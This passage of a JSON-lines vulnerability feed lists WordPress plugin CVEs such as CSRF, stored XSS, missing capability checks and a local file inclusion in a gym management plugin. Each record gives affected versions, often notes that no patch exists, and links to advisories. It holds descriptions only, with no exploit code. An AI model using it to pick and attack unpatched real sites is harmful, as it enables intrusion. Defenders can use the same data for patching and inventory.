customers.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925361\\\/payment-gateway-stripe-and-woocommerce-integration\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925361\\\/payment-gateway-stripe-and-woocommerce-integration\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-gateway-stripe-and-woocommerce-integration\\\/tags\\\/3.7.7\\\/includes\\\/class-stripe-checkout.php#L640\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-gateway-stripe-and-woocommerce-integration\\\/tags\\\/3.7.7\\\/includes\\\/class-stripe-checkout.php#L640\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d052f3e-8554-43f0-a5ae-1de09c198d7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d052f3e-8554-43f0-a5ae-1de09c198d7b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3590","slug":"letterpress","versionImpact":"1.2.2","description":"The LetterPress  WordPress plugin through 1.2.2 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks, such as delete arbitrary subscribers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/829f4d40-e5b0-4009-b753-85ca2a5b3d25\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/829f4d40-e5b0-4009-b753-85ca2a5b3d25\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4427","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.5. This makes it possible for authenticated attackers, with subscriber access or above, to change plugin settings and perform other actions such deleting sliders.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab68a08d-a6d4-4424-a7bf-219951f752fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab68a08d-a6d4-4424-a7bf-219951f752fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5155","slug":"inquiry-cart","versionImpact":"3.4.2","description":"The Inquiry cart WordPress plugin through 3.4.2 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1e90a8a-d959-4316-a5d4-e183854944bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1e90a8a-d959-4316-a5d4-e183854944bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5993","slug":"cliengo","versionImpact":"3.0.1","description":"The Cliengo \u2013 Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_session' function in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the session token of the chatbot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a13e87d-51cd-43b0-a658-900a174738fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a13e87d-51cd-43b0-a658-900a174738fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L109\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6520","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a30d35c-9883-4b0f-83a2-494401c45d8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a30d35c-9883-4b0f-83a2-494401c45d8e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11424","slug":"slick-sitemap","versionImpact":"2.0.0","description":"The Slick Sitemap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slick-sitemap' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-sitemap\\\/trunk\\\/slick-sitemap.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-sitemap\\\/trunk\\\/slick-sitemap.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-sitemap\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/slick-sitemap\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2495fd6-5a36-4bdf-b4e0-68095072d820?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2495fd6-5a36-4bdf-b4e0-68095072d820?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11444","slug":"cluevo-lms","versionImpact":"1.13.2","description":"The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L925\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L925\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L928\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L928\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12220","slug":"wc-sms","versionImpact":"2.8.1","description":"The SMS for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207316\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207316\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-sms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wc-sms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35707e4e-ca67-43fe-b120-79101ef31155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35707e4e-ca67-43fe-b120-79101ef31155?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12073","slug":"meteor-slides","versionImpact":"1.5.7","description":"The Meteor Slides plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slide_url_value' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/meteor-slides\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/meteor-slides\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be913494-f4a7-4718-ac2b-da4baf2b0a21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be913494-f4a7-4718-ac2b-da4baf2b0a21?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13551","slug":"abc-notation","versionImpact":"6.1.3","description":"The ABC Notation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'abcjs' shortcode in all versions up to, and including, 6.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10930fd-fae0-4554-acf3-da81a124f79d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10930fd-fae0-4554-acf3-da81a124f79d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1559","slug":"cc-img-shortcode","versionImpact":"1.1.0","description":"The CC-IMG-Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'img' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cc-img-shortcode\\\/trunk\\\/includes\\\/class-img-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cc-img-shortcode\\\/trunk\\\/includes\\\/class-img-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cc-img-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cc-img-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81803a24-51ba-4d23-88ef-553cb4754977?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81803a24-51ba-4d23-88ef-553cb4754977?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3099","slug":"advanced-search-by-my-solr-server","versionImpact":"2.0.5","description":"The Advanced Search by My Solr Server plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the 'MySolrServerSettings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.inc.php#L66\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.inc.php#L66\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.php#L1008\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server.php#L1008\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server-options-page.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-search-by-my-solr-server\\\/tags\\\/2.0.5\\\/advanced-search-by-my-solr-server-options-page.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-search-by-my-solr-server\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-search-by-my-solr-server\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250d1bea-793d-4c13-976b-bfc3ff7d9160?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250d1bea-793d-4c13-976b-bfc3ff7d9160?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11190","slug":"jwp-a11y","versionImpact":"4.1.7","description":"The jwp-a11y WordPress plugin through 4.1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66b914ba-4253-4849-a38a-05ab246a9a32\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/66b914ba-4253-4849-a38a-05ab246a9a32\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3671","slug":"gym-management","versionImpact":"67.7.0","description":"The WPGYM - Wordpress Gym Management System plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 67.7.0 via the 'page' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The Local File Inclusion exploit can be chained to include various dashboard view files in the plugin. One in particular reported by the researcher can be leveraged to update the password of Super Administrator accounts in Multisite environments making privilege escalation possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/-wpgym-wordpress-gym-management-system\\\/13352964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6536d19f-a042-4404-b0c9-91aacd7768f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6536d19f-a042-4404-b0c9-91aacd7768f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-43459","slug":"captainform","versionImpact":"2.5.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Forms by CaptainForm \u2013 Form Builder for WordPress plugin <= 2.5.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-2-5-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2354","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings reachable though an AJAX action in versions up to, and including, 3.9.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f8514c9-0e11-4e26-ba0b-1d08a990b56c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f8514c9-0e11-4e26-ba0b-1d08a990b56c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-23517","slug":"calendar-booking","versionImpact":"3.5.10","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Start Booking Scheduling Plugin \u2013 Online Booking for WordPress allows Stored XSS.This issue affects Scheduling Plugin \u2013 Online Booking for WordPress: from n\/a through 3.5.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/calendar-booking\\\/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/calendar-booking\\\/wordpress-scheduling-plugin-online-booking-for-wordpress-plugin-3-5-10-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3582","slug":"ungallery","versionImpact":"2.2.4","description":"The UnGallery WordPress plugin through 2.2.4 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a348b5d-13aa-40c3-9d21-0554683f8019\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a348b5d-13aa-40c3-9d21-0554683f8019\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4426","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on several functions hooked to AJAX actions. This makes it possible for unauthenticated attackers to change slider titles, delete sliders and modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9b284a-2af9-4d20-9663-a40b9330da35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9b284a-2af9-4d20-9663-a40b9330da35?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4751","slug":"wp-prayers-request","versionImpact":"2.4.7","description":"The WP Prayer II WordPress plugin through 2.4.7 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94f4cc45-4c55-43d4-8ad2-a20c118b589f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/94f4cc45-4c55-43d4-8ad2-a20c118b589f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5992","slug":"cliengo","versionImpact":"3.0.1","description":"The Cliengo \u2013 Chatbot plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_chatbot_token' and 'update_chatbot_position' functions in all versions up to, and including, 3.0.1. This makes it possible for unauthenticated attackers to change chatbot settings, which can lead to unavailability or other changes to the chatbot.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f0afe8-234a-4c3f-87c8-f3f23ac94fe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f0afe8-234a-4c3f-87c8-f3f23ac94fe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cliengo\\\/trunk\\\/admin\\\/class-cliengo-form.php#L99\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6518","slug":"fluentform","versionImpact":"5.1.19","description":"The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66ca9c39-1ba0-4208-ae35-d2c3c9ea4eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66ca9c39-1ba0-4208-ae35-d2c3c9ea4eb9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125227\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12219","slug":"stop-registration-spam","versionImpact":"1.23","description":"The Stop Registration Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206562\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stop-registration-spam\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stop-registration-spam\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d5fb4ac-f86e-4b5e-ad4b-be19158ab745?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d5fb4ac-f86e-4b5e-ad4b-be19158ab745?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11887","slug":"geo-targetly-geo-content","versionImpact":"6.0","description":"The Geo Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'geotargetlygeocontent' shortcode in all versions up to, and including, 6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-targetly-geo-content\\\/trunk\\\/geotargetly-geo-content.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geo-targetly-geo-content\\\/trunk\\\/geotargetly-geo-content.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-targetly-geo-content\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/geo-targetly-geo-content\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c52cdb58-c97a-43a6-a3ff-be084ceee085?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c52cdb58-c97a-43a6-a3ff-be084ceee085?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
